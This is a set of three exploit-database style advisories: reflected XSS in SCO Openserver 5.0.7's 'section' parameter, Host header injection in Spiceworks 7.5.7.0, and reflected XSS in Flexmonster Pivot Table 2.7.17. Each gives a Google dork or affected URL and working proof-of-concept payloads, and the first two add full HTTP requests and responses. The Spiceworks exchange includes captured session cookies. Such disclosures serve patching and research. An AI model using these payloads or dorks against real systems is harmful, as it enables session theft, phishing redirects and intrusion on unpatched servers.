# Exploit Title: SCO Openserver 5.0.7 - 'section' Reflected XSS # Google Dork: inurl:/cgi-bin/manlist?section # Discovered Date: 14/06/2020 # Author: Ramikan # Vendor Homepage: https://www.xinuos.com/products # Software Link: https://www.sco.com/products/openserver507/-overview # Affected Version: Tested on 5.0.7, 6 can be affected on other versions. # Tested on: SCO Openserver 5.0.7 & version 6 # CVE : CVE-2020-25495 ************************************************************************************************************************************* Vulnerability :Refelected XSS & HTML Injection ************************************************************************************************************************************* A reflected Cross-site scripting (XSS) vulnerability in Xinuo (formerly SCO) Openserver version 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section'. Affected URL:http://host:8457/cgi-bin/manlist?section="><h1>hello</h1><script>alert(123)</script> Affected Paramenter: section ************************************************************************************************************************************* POC ************************************************************************************************************************************* Request: ************************************************************************************************************************************* GET /cgi-bin/manlist?section="><h1>hello</h1><script>alert(123)</script> HTTP/1.1 Host: 192.168.20.48:8457 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 ************************************************************************************************************************************* Response: ************************************************************************************************************************************* HTTP/1.1 200 OK Date: Thu, 03 Sep 2020 17:08:51 GMT Server: Apache/1.3.36 (Unix) mod_perl/1.29 Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 2680 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US"> <head> <title>Manual section "><h1>hello</h1></P><script>alert(123)</script></title> <META HTTP-EQUIV='Content-Type' CONTENT='text/html;charset=ISO-8859-1'> <link rel="stylesheet" type="text/css" href="/styles/lin_moz.css" /> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> </head> <body bgcolor="#FFFFFF" topmargin="0" marginheight="0"> <!-- Begin DocView navigation toolbar --> <!--htdig_noindex--> <table class=dvtb width="100%" cellpadding=0 cellspacing=0 border=0 style="padding: 0;" > <tr valign=top class=dvtb> <td class=dvdb> <table class=dvtb cellpadding=3 cellspacing=1 border=0 bgcolor=#FFFFFF width=611 > <tr class=dvtb> <td class=dvtb align=center style="background: #2059A6;"> <a href="/en/index.html" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;"> DOC HOME </a></td> <td class=dvtb align=center style="background: #2059A6;"> <a href="/en/Navpages/sitemap.html" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;"> SITE MAP </a></td> <td class=dvtb align=center style="background: #2059A6;"> <a href="/cgi-bin/manform?lang=en" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;"> MAN PAGES </a></td> <td class=dvtb align=center style="background: #2059A6;"> <a href="/cgi-bin/infocat?lang=en" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;"> GNU INFO </a></td> <td class=dvtb align=center style="background: #2059A6;"> <a href="/cgi-bin/search?lang=en" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;"> SEARCH </a></td> </tr> </table> </td> <td class=dvtb align="left" width=100%> <table class=dvtb cellpadding="3" cellspacing="1" border="0" width="100%" bgcolor="#FFFFFF" > <tr class=dvtb valign="top"> <td class=dvtb style="background: #2059A6;" align=center width=100%> <a name=null class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;" > &nbsp; </a> </td> </tr> </table> </td> </tr> </table> <!--/htdig_noindex--> <!-- End DocView navigation toolbar --> <h1>Manual section<h1>Manual section "><h1>hello</h1></P><script>alert(123)</script></h1><PRE> </PRE> </body></html>

# Exploit Title: Spiceworks 7.5 - HTTP Header Injection # Google Dork: inurl:/pro_users/login # Discovered Date: 15/09/2020 # Exploit Author: Ramikan # Vendor Homepage: https://www.spiceworks.com # Affected Version: 7.5.7.0 may be others. # Tested On Version: 7.5.7.0 # CVE : CVE-2020-25901 Vulnerability: Host Header Injection Description: Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Spiceworks version 7.5.7.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack. Request: GET / HTTP/1.1 Host: google.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; compatibility_test=testing; _gk=%7B%22t%22%3A%7B%7D%2C%22p%22%3A%7B%22cg_allow_st%22%3A%22%5B%5D%22%2C%22uuid%22%3A%22b7f707b6-f574-44bb-a766-986fc5851a03%22%7D%2C%22ab%22%3A%7B%7D%7D; opt_out=zdc; euconsent=BO3ulHHO3ulQVASABAENDWAAAAAyOAAA; _evidon_suppress_notification_cookie={"date":"\"2020-09-15T12:20:47Z\""} Upgrade-Insecure-Requests: 1 Response: HTTP/1.1 302 Found Date: Tue, 15 Sep 2020 12:46:52 GMT Cache-Control: no-cache X-Runtime: 0 Set-Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; path=/; HttpOnly Location: http://google.com/pro_users/login Content-Length: 99 Connection: close Content-Type: text/html; charset=utf-8 <html><body>You are being <a href="http://google.com/pro_users/login">redirected</a>.</body></html> Request:2 GET /pro_users/login HTTP/1.1 Host: google.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; compatibility_test=testing; _gk=%7B%22t%22%3A%7B%7D%2C%22p%22%3A%7B%22cg_allow_st%22%3A%22%5B%5D%22%2C%22uuid%22%3A%22b7f707b6-f574-44bb-a766-986fc5851a03%22%7D%2C%22ab%22%3A%7B%7D%7D; opt_out=zdc; euconsent=BO3ulHHO3ulQVASABAENDWAAAAAyOAAA; _evidon_suppress_notification_cookie={"date":"\"2020-09-15T12:20:47Z\""} Upgrade-Insecure-Requests: 1 Response:2 (Forgot your password)Link replaced with domain in the header. HTTP/1.1 200 OK Date: Tue, 15 Sep 2020 12:48:26 GMT Cache-Control: private, max-age=0, must-revalidate X-UA-Compatible: IE=edge,chrome=1 X-Runtime: 0 ETag: "77c8f98180ec3f6d4f2fcc8dcd796462" Set-Cookie: compatibility_test=testing; path=/ Set-Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; path=/; HttpOnly Content-Length: 9875 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html> <html lang="en" class="no-js desktop"> <head> <meta charset="utf-8" /> <title>Spiceworks</title> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="author" content="Spiceworks, Inc." /> <meta name="description" content="Network management made simple" /> <meta name="version" content="unknown" /> <noscript> <meta http-equiv="refresh" content="2;url=/sessions/incompatible" /> </noscript> <link href="/assets/sui.css?7500070" media="all" rel="stylesheet" type="text/css" /> <link href="/assets/base.css?7500070" media="all" rel="stylesheet" type="text/css" /> <link href="/assets/application.css?7500070" media="all" rel="stylesheet" type="text/css" /> <!--[if IE]><link href="/stylesheets/hacks.ie.css?7500070" media="all" rel="stylesheet" type="text/css" /><![endif]--> <!--[if IE 7]><link href="/stylesheets/hacks.ie7.css?7500070" media="screen" rel="stylesheet" type="text/css" /><![endif]--> <!--[if IE 8]><link href="/stylesheets/hacks.ie8.css?7500070" media="screen" rel="stylesheet" type="text/css" /><![endif]--> <link href="/stylesheets/print.css?7500070" media="print" rel="stylesheet" type="text/css" /> <link href="/assets/sui-print.css?7500070" media="print" rel="stylesheet" type="text/css" /> <link href="/assets/wizard.css?7500070" media="screen" rel="stylesheet" type="text/css" /> <script src="/assets/sui_bundle.js?7500070" type="text/javascript"></script> <script type="text/javascript"> //<![CDATA[ var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-314222-21']); _gaq.push(['_setDomainName', 'none']); _gaq.push(['_setAllowLinker', true]); _gaq.push(['_trackPageview']); _gaq.push(['_setCustomVar', 1, '_v', '7.5.00070', 3]); _gaq.push(['_setCustomVar', 2, '_d', 'xl', 3]); _gaq.push(['_setCustomVar', 3, '_u', '2', 3]); _gaq.push(['_setCustomVar', 4, '_ul', 'anonymous', 2]); _gaq.push(['_setCustomVar', 5, '_m', 'anonymous', 2]); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); //]]> </script> <script type="text/javascript"> //<![CDATA[ SPICEWORKS.ready(function(){ SPICEWORKS.fire('app:ready'); }); document.observe('dom:loaded', function(){ SPICEWORKS.fire('ready'); }); //]]> </script> <script type="text/javascript"> //<![CDATA[ (function($){ $(document).ready(function(){ $('#flash-notice-message').delay(9000).slideUp(300); }); })(jQuery); //]]> </script> <script type="text/javascript"> //<![CDATA[ var gekko = gekko || {}; gekko.cmd = gekko.cmd || []; gekko.times = gekko.times || []; gekko.times.push({ gekkoRequest: new Date().getTime() }); gekko.client = gekko.client || {}; gekko.client.app = { 'id': 'SWD', 'env': 'p', 'version': '7.5.00070' }; gekko.client.user = {}; gekko.client.user.uuid = 'b7f707b6-f574-44bb-a766-986fc5851a03'; //]]> </script> <script async="false" src="//gekko.spiceworks.com/gekko.js" type="text/javascript"></script> <script async="true" type='text/javascript' src='//www.googletagservices.com/tag/js/gpt.js'></script> <script type="text/javascript"> //<![CDATA[ gekko.cmd.push({cmd: function() { gekko.setAnalytics('_v', '7.5.00070'); }, important: true}); //]]> </script> <script> var SWUFR = SWUFR || {}; SWUFR.cmd = SWUFR.cmd || []; </script> <script async src="//gekko.spiceworks.com/swufr.js"></script> <script> SWUFR.cmd.push(function() { SWUFR.ufr.installed() }); </script> </head> <!--[if lt IE 7]> <body class="left-registerlogin-desktop sui-opt-in ie ie6 lte9 lte8 lte7 desktop"> <![endif]--> <!--[if IE 7]> <body class="left-register login-desktop sui-opt-in ie ie7 lte9 lte8 lte7 desktop"> <![endif]--> <!--[if IE 8]> <body class="left-register login-desktop sui-opt-in ie ie8 lte9 lte8 desktop"> <![endif]--> <!--[if IE 9]> <body class="left-register login-desktop sui-opt-in ie ie9 lte9 desktop"> <![endif]--> <!--[if !IE]><!--> <body class="left-register login-desktop sui-opt-in no-ie desktop"> <!--<![endif]--> <header class="site-navigation sui-opt-in"> <nav class="global-nav affix" data-navbar="global" data-search-autocomplete-min-length=""> <div class="nav-fluid-container"> <a href="/" class="global-nav_brand">Home</a> <img src="//static.spiceworks.com/assets/masthead/print_logo.png" class='global-nav_print-logo' /> </div> </nav> </header> <!--[if lte IE 9]> <div class="modal hide has-footer-in-body" data-backdrop="true" data-isdraggable="false" data-keyboard="false" id="install_chrome_frame"><div class="modal-header"> <h3>I'm gonna have to go ahead and ask you to use a different browser.</h3></div><div class="modal-body"> <img id="lumberg" src="/images/other/yeeeaaah.png" style="float:left; width:200px; "> <div class="sui-opt-in" id="chrome_frame_install" style="padding-left: 10px; overflow:hidden; min-height:150px"> <p style="padding-top:10px; font-size:13px">Yeaaaah… what's happening? </p> <p>We went ahead and stopped supporting Internet Explorer 9 and older in the Spiceworks app (IE10+ is now required), so if you could just go ahead and upgrade IE, that would be great… </p> <p style="padding-top:10px; font-size:11px; color: #AAA;">(Doesn't take long to install, and makes Spiceworks so much faster!)</p> </div> <div class="sui-opt-in" id="chrome_frame_reload" style="padding-left: 10px; overflow:hidden;"> <h4 class=""> <strong> Whoops, looks like you might have gotten stuck. </strong> </h4> </div> <div class="footer-actions blue-permission-granted"> <a class="sui-bttn ieUpgrade" href="#" id="ieUpgrade" onclick=" upgradeIE(); ; return false;">Upgrade Internet Explorer</a> </div> </div></div> <script type="text/javascript"> //<![CDATA[ jQuery(function(){ SPICEWORKS.stats.record("chrome_frame_prompt_shown", {category: 'unsupported_ie'}); jQuery('#install_chrome_frame').modal(); }) function upgradeIE(){ SPICEWORKS.stats.record("installed_newer_ie", {category: 'unsupported_ie'}); window.location.href = "http://windows.microsoft.com/en-US/internet-explorer/download-ie"; } //]]> </script> <![endif] --> <div class="sui-fluid-container"> <div id="content"> <img alt="Startup-bg" id="bg" src="/images/wizard/startup-bg.png?7500070" /> <div id="container"> <div id="wrapper"> <div id="float-msg"> <h1>Spiceworks is ready to rock!</h1> <p>Please enter your login credentials.</p> </div> <div class="main-outer-border"><div class="main-inner-border"><div class="main-header logo"><h1><img alt="Spiceworks" class="logo" src="/images/logos/large.png?7500070" /></h1><div class="shadow-line ">&nbsp</div> </div><div class="main"> <div id="flash-container-for-sessions-new"> </div> <form accept-charset="UTF-8" action="/pro_users/login" class="form-horizontal login" id="login_form" method="post"><div style="margin:0;padding:0;display:inline"><input name="authenticity_token" type="hidden" value="r+sYwqxdzOJAV6XSoVaYQ4HObg5uTfHFjtuDg3ZmH9k=" /></div><div style="margin:0;padding:0;display:inline;"><input name="_pickaxe" type="hidden" value="⸕" /></div> <div class=" control-group"><label for="pro_user_email">Email</label><div class="controls"><input id="pro_user_email" label="Email" name="pro_user[email]" size="30" type="text" /><span class="help-inline"></span></div></div> <div class=" control-group"><label for="pro_user_password">Password</label><div class="controls"><input id="pro_user_password" label="Password" name="pro_user[password]" size="30" type="password" /><span class="help-inline"></span></div></div> <div class="control-group controls forgot_password"> <a href="http://google.com/wizard/password/new" class="forgot-password">Forgot your password?</a> </div> <div class=" control-group"><div class="controls"> <label class='checkbox'> <input name="pro_user[remember_me]" type="hidden" value="0" /><input id="pro_user_remember_me" name="pro_user[remember_me]" type="checkbox" value="1" /> Stay logged in </label> </div></div> <div class=" control-group"><div class="controls"> <button class="sui-bttn-primary sui-bttn " data-button-type="submit" data-primary="true" type="submit">Log in</button> </div></div> </form> </div></div></div> </div> </div> </div> </div> <div id="footer"> <hr/> <span class="pull-left"> <p>Copyright &copy; 2006-16 Spiceworks, Inc.</p> </span> <span class="pull-right"> <p> <a href="https://www.spiceworks.com/about/">About</a> &bull; <a href="https://www.spiceworks.com/privacy/">Privacy</a> &bull; <a href="https://www.spiceworks.com/terms/">Terms</a> &bull; <a href="https://community.spiceworks.com/support?utm_campaign=app_help&utm_medium=app&utm_source=app_ui">Help</a> </p> </span> </div> <script src="/assets/wizard.js?7500070" type="text/javascript"></script> </body> </html>

# Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'To OLAP' Reflected XSS # Date: 08/01/2020 # Exploit Author: Marco Nappi # Vendor Homepage: https://www.flexmonster.com/ # Version:Flexmonster Pivot Table & Charts 2.7.17 # Tested on:Flexmonster Pivot Table & Charts 2.7.17 # CVE : CVE-2020-20141 Cross Site Scripting (XSS) vulnerability in the To OLAP (XMLA) component Under the Connect menu in Flexmonster Pivot Table & Charts 2.7.17. Reflected XSS: The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload. payload: <svg onload=alert("OLAPTool")><!--